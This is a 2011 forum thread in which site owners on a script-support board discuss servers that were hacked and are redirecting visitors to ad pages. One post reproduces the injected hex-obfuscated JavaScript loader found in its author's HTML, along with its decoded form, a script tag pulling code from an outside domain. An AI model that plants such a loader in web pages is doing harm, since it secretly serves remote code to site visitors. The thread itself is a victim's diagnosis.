Script Pulse

Trade Pulse => Trade Pulse Support => Topic started by: BluesMan on October 08, 2011, 06:07:54 AM

Title: Question to those whose servers got hacked.
Post by: BluesMan on October 08, 2011, 06:07:54 AM

How did you find out that your server was hacked? What was the source code or what was being redirected etc.
I'm trying to get the bottom of why one of my sites is redirecting to advertising pages.

Title: Re: Question to those whose servers got hacked.
Post by: BluesMan on October 08, 2011, 07:40:36 AM

Javascript is getting injected into my html pages.

Code: [Select]

<script>var i,y,x="3c736372697074206c616e67756167653d276a61766173637269707427207372633d27687474703a2f2f7777772e636c617961696d2e636f6d2f696e6465782e7068703f7265663d7765626578273e3c2f7363726970743e";y='';for(i=0;i<x.length;i+=2){y+=unescape('%'+x.substr(i,2));}document.write(y);</script>

Which I managed to decode, which is.

Code: [Select]

<script language='javascript' src='http://www.clayaim.com/index.php?ref=webex'></script>


I've contacted my host about it, will let you know how I get on.

Title: Re: Question to those whose servers got hacked.
Post by: JB on October 09, 2011, 08:01:18 AM

I discovered it when my traffic started dropping for no reason.  I flicked through a handful of my sites and most of them were directing to Ad pages.
Its definately only my TP sites though.  My few sites I have left on other scripts are working fine.
I have followed Killdozers instructions over and over, but the following day, the ads are back again, so who knows?